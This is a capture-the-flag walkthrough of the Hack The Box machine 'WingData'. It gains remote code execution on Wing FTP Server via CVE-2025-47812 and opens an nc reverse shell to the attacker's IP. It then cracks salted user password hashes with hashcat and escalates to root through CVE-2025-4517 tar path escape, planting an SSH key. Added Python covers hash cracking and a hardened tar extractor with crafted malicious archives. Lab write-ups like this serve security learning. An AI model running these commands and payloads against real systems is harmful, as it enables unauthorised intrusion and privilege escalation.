HTB-WingData

Nmap

┌──(kali👻Thr2on1)-[~/Websec/HTB/WingData]
└─$ sudo nmap -p- --min-rate 5000 -oA nmapscans/ports 10.129.239.109
Nmap scan report for 10.129.239.109
Host is up (0.099s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Only two ports are open: SSH and HTTP.

CVE-2025-47812

The web application's home page links to ftp.wingdata.htb, which turns out to be Wing FTP Server v7.4.3. A search for known vulnerabilities shows that this version is affected by CVE-2025-47812 (affected versions: < 7.4.4), an unauthenticated remote code execution flaw. A public exploit is available on GitHub (https://github.com/4m3rr0r/CVE-2025-47812-poc).

┌──(kali👻Thr2on1)-[~/Websec/HTB/WingData/CVE-2025-47812-poc]
└─$ python3 CVE-2025-47812.py -u http://ftp.wingdata.htb/ -c "id"

[*] Testing target: http://ftp.wingdata.htb/
[+] Sending POST request to http://ftp.wingdata.htb//loginok.html with command: 'id' and username: 'anonymous'
[+] UID extracted: c9495b9aea10e5a08fb75c2d5de4aabbf528764d624db129b32c21fbca0cb8d6
[+] Sending GET request to http://ftp.wingdata.htb//dir.html with UID: c9495b9aea10e5a08fb75c2d5de4aabbf528764d624db129b32c21fbca0cb8d6

--- Command Output ---
uid=1000(wingftp) gid=1000(wingftp) groups=1000(wingftp),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
----------------------

The id command ran successfully, so the same path can be used to launch a reverse shell:

nc 10.10.16.9 4444 -e /bin/sh

The target has Python installed, so the shell can be upgraded to a proper PTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Foothold

listening on [any] 4444 ...
connect to [10.10.16.9] from (UNKNOWN) [10.129.96.80] 57328
python3 -c 'import pty;pty.spawn("/bin/bash")'
wingftp@wingdata:/opt/wftpserver$ id
id
uid=1000(wingftp) gid=1000(wingftp) groups=1000(wingftp),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)

The shell runs as the wingftp user. /etc/passwd shows that a wacky user also exists. First, gather information on the target.

wingftp@wingdata:/opt/wftpserver/Data/1/users$ ls -al
ls -al
total 28
drwxr-x--- 2 wingftp wingftp 4096 Feb 15 22:00 .
drwxr-x--- 4 wingftp wingftp 4096 Feb 9 08:19 ..
-rwxr-x--- 1 wingftp wingftp 2842 Feb 15 22:00 anonymous.xml
-rwxr-x--- 1 wingftp wingftp 2846 Nov 2 11:13 john.xml
-rw-rw-rw- 1 wingftp wingftp 2847 Nov 2 12:05 maria.xml
-rw-rw-rw- 1 wingftp wingftp 2847 Nov 2 12:02 steve.xml
-rw-rw-rw- 1 wingftp wingftp 2856 Nov 2 12:28 wacky.xml

The Data/1/users directory holds one configuration file per user, and each contains that user's password hash. Save all of them for offline cracking. The Wing FTP Server documentation describes how passwords are stored: SHA-256, with a salt appended when salting is enabled.

The salt settings are in Data/1/settings.xml:

<EnablePasswordSalting>1</EnablePasswordSalting>                                                         
<SaltingString>WingFTP</SaltingString>

Crack them with hashcat. Mode 1410 is sha256($pass.$salt), so each line of the input file is hash:salt:

pass.hash

32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP
5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca:WingFTP
a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03:WingFTP
c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10:WingFTP
d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP
┌──(kali👻Thr2on1)-[~/Websec/HTB/WingData/CVE-2025-47812-poc]
└─$ hashcat -m 1410 -a 0 pass.hash /usr/share/wordlists/rockyou.txt
32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP:!#7Blushing^*Bride5
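The following Python is an added example, not part of the writeup or of Wing FTP Server, that reproduces the scheme offline: it reads the two salt settings from a constructed settings.xml fragment (the enclosing Settings element name is an assumption), computes sha256(password || salt), which is exactly what hashcat mode 1410 checks, emits the hash:salt line hashcat expects, and runs a wordlist against a hash. The candidate words and the test password are constructed; the main block additionally re-checks the cracked password against the first hash from pass.hash.

```python
import hashlib
import xml.etree.ElementTree as ET
from typing import Iterable, Optional

# Constructed fragment mirroring the two settings quoted from Data/1/settings.xml.
# The <Settings> root element is an assumption; only the two inner tags are from the box.
SETTINGS_XML = """<Settings>
  <EnablePasswordSalting>1</EnablePasswordSalting>
  <SaltingString>WingFTP</SaltingString>
</Settings>"""


def read_salt(settings_xml: str) -> str:
    """Return the salt to append, or "" when salting is disabled."""
    root = ET.fromstring(settings_xml)
    enabled = root.findtext("EnablePasswordSalting", default="0").strip() == "1"
    return root.findtext("SaltingString", default="").strip() if enabled else ""


def wingftp_hash(password: str, salt: str) -> str:
    # sha256(password || salt): the construction hashcat -m 1410 (sha256($pass.$salt)) verifies.
    return hashlib.sha256((password + salt).encode("utf-8")).hexdigest()


def to_hashcat_line(hash_hex: str, salt: str) -> str:
    """One line of the hash:salt file fed to hashcat -m 1410."""
    return f"{hash_hex}:{salt}"


def crack(target_hex: str, salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Tiny offline equivalent of the hashcat run: first candidate whose salted hash matches."""
    target_hex = target_hex.lower()
    for password in candidates:
        if wingftp_hash(password, salt) == target_hex:
            return password
    return None


if __name__ == "__main__":
    salt = read_salt(SETTINGS_XML)
    # First hash from pass.hash and the password hashcat recovered for it.
    page_hash = "32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca"
    print(to_hashcat_line(page_hash, salt))
    print("matches" if wingftp_hash("!#7Blushing^*Bride5", salt) == page_hash else "no match")
```

If EnablePasswordSalting were 0, read_salt returns an empty string and the same function degrades to plain SHA-256 (hashcat mode 1400), so checking that flag before choosing the mode saves a wasted run.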

The cracked password lets us log in over SSH as wacky.

CVE-2025-4517 to ROOT

Check which commands the user may run with sudo:

wacky@wingdata:~$ sudo -l
Matching Defaults entries for wacky on wingdata:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User wacky may run the following commands on wingdata:
(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *

wacky can run the Python script /opt/backup_clients/restore_backup_clients.py as root without a password. Download the script and audit it: it extracts a tar archive from /opt/backup_clients/backups into a staging directory under /opt/backup_clients/restored_backups.

Vulnerable code:

    try:
        with tarfile.open(backup_path, "r") as tar:
            tar.extractall(path=staging_dir, filter="data")
        print(f"[+] Extraction completed in {staging_dir}")
    except (tarfile.TarError, OSError, Exception) as e:
        print(f"[!] Error during extraction: {e}", file=sys.stderr)
        sys.exit(2)

This is CVE-2025-4517. The data filter passed to tarfile.extractall() / TarFile.extract() is supposed to refuse entries that resolve outside the destination, but on an unpatched Python the realpath-based check can be bypassed with crafted archive members, so an entry can be written to an arbitrary path (filter="tar" is affected as well). Since the script runs as root via sudo, that write happens as root. We can therefore plant our own public key in /root/.ssh/authorized_keys and log in as root over SSH. A GitHub exploit generates the malicious tar archive (https://github.com/DesertDemons/CVE-2025-4138-4517-POC).
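For the defensive side, the following is an added example (mine, not the box's restore script and not CPython's filter) of how a privileged restore job can avoid relying on the extraction filter at all: it only restores regular files and directories, rejects absolute and ".." names lexically, resolves every destination path on disk so that a symlink already present under the staging directory cannot redirect the write, and copies file contents itself instead of calling extract(). The three sample archives, the client file name and the fake key line are constructed for the demo.

```python
import io
import os
import tarfile
import tempfile
from pathlib import Path


class UnsafeMember(Exception):
    """A tar entry that must not be restored."""


def _checked_target(dest: Path, member: tarfile.TarInfo) -> Path:
    # 1. Type allow-list: a client backup needs only files and directories,
    #    so symlinks, hardlinks and device nodes are refused outright.
    if not (member.isfile() or member.isdir()):
        raise UnsafeMember(f"{member.name!r}: only regular files and directories are restored")
    # 2. Lexical check: no absolute names and no '..' components.
    if member.name.startswith("/") or ".." in Path(member.name).parts:
        raise UnsafeMember(f"{member.name!r}: absolute or traversing path")
    # 3. On-disk check: resolve() follows any symlink that already exists under
    #    dest, so a previously planted link cannot redirect the write either.
    target = (dest / member.name).resolve()
    if not target.is_relative_to(dest):
        raise UnsafeMember(f"{member.name!r}: resolves to {target}, outside {dest}")
    return target


def safe_extract(tar_path: str, dest_dir: str) -> list:
    """Restore tar_path under dest_dir without using TarFile.extract*; returns names written."""
    dest = Path(dest_dir).resolve()
    dest.mkdir(parents=True, exist_ok=True)
    written = []
    with tarfile.open(tar_path, "r") as tar:
        for member in tar:
            target = _checked_target(dest, member)
            if member.isdir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            with tar.extractfile(member) as src, open(target, "wb") as dst:
                dst.write(src.read())
            # Drop setuid/setgid/sticky and group/world write bits from the archive mode.
            os.chmod(target, member.mode & 0o755)
            written.append(member.name)
    return written


def make_sample_tars(workdir: str) -> tuple:
    """Constructed inputs: a benign backup, a symlink escape and a '..' traversal."""
    benign = os.path.join(workdir, "backup_1001.tar")
    with tarfile.open(benign, "w") as tar:
        data = b"client=acme\n"
        info = tarfile.TarInfo("clients/acme.cfg")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))

    symlink_escape = os.path.join(workdir, "backup_1002.tar")
    with tarfile.open(symlink_escape, "w") as tar:
        link = tarfile.TarInfo("clients")          # 'clients' -> /root/.ssh, then write through it
        link.type = tarfile.SYMTYPE
        link.linkname = "/root/.ssh"
        tar.addfile(link)
        data = b"ssh-ed25519 AAAA... attacker\n"   # constructed placeholder key line
        info = tarfile.TarInfo("clients/authorized_keys")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))

    traversal = os.path.join(workdir, "backup_1003.tar")
    with tarfile.open(traversal, "w") as tar:
        data = b"ssh-ed25519 AAAA... attacker\n"
        info = tarfile.TarInfo("../../root/.ssh/authorized_keys")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return benign, symlink_escape, traversal


def demo() -> dict:
    """Run the three archives through safe_extract; hostile ones yield the rejection reason."""
    results = {}
    with tempfile.TemporaryDirectory() as work:
        benign, symlink_tar, traversal_tar = make_sample_tars(work)
        results["benign"] = safe_extract(benign, os.path.join(work, "restore_benign"))
        for label, path in (("symlink", symlink_tar), ("traversal", traversal_tar)):
            try:
                safe_extract(path, os.path.join(work, "restore_" + label))
                results[label] = None
            except UnsafeMember as exc:
                results[label] = str(exc)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The ordering matters: the type allow-list runs first, so the symlink member is rejected before anything is written, and nothing from a rejected archive reaches the staging directory. Restoring as an unprivileged user rather than root, as the sudo rule here allows, would limit the damage further.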

0x01 Generate an SSH key pair

ssh-keygen -t ed25519 -f id_ed25519 -N ""

This produces the private key id_ed25519 and the public key id_ed25519.pub.

0x02 Generate the tar archive

python3 exploit.py --tar-out backup_1002.tar --target /root/.ssh/authorized_keys --payload id_ed25519.pub --mode 0600

0x03 Upload to the target and exploit

The archive can be uploaded to the target in several ways (scp over the existing wacky SSH session is the simplest). Then run the restore script against it as root:

wacky@wingdata:/opt/backup_clients/backups$ sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_1002.tar -r restore_pwn
[+] Backup: backup_1002.tar
[+] Staging directory: /opt/backup_clients/restored_backups/restore_pwn
[+] Extraction completed in /opt/backup_clients/restored_backups/restore_pwn

0x04 Log in over SSH

ssh -i id_ed25519 root@wingdata.htb
root@wingdata:~# id
uid=0(root) gid=0(root) groups=0(root)